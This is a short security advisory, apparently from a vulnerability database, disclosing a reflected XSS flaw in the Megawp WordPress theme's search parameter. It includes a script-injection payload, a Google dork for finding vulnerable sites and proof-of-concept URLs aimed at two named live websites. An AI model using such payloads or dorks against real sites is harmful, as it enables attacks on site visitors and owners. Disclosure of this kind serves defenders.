Megawp WordPress Theme - Unauthenticated Reflected XSS

2021.12.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

- # VULNERABILITY: Megawp WordPress Theme - Unauthenticated Reflected XSS - # GOOGLE DORK: Megawp-Theme - # DATE: 2021-02-10 - # SECURITY RESEARCHER: EbRaHiM-VaKeR [ https://ebrahim-ghiasi.ir ] - # VENDOR: Megawp-Theme [ http://megawp.almastheme.com/megawp-demos/ ] - # SOFTWARE VERSION: <= 1 - # SOFTWARE LINK: https://www.zhaket.com/web/megawp-wordpress-theme - # CVE: N/A */ ### -- [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Megawp-Theme for WordPress. [i] Vulnerable parameter(s): ?s= ### -- [ Impact: ] [~] code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payload: ] [$] ?s="><script>alert(`hacked`)</script> ### -- [ PoC | Unauthenticated Reflected XSS | Search query: ] [!] https://lms.golvani.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E [!] https://baameshimi.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E ### -- [ Contacts: ] [+] Website: ebrahim-ghiasi.ir [+] Telegram: @hajit00n


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top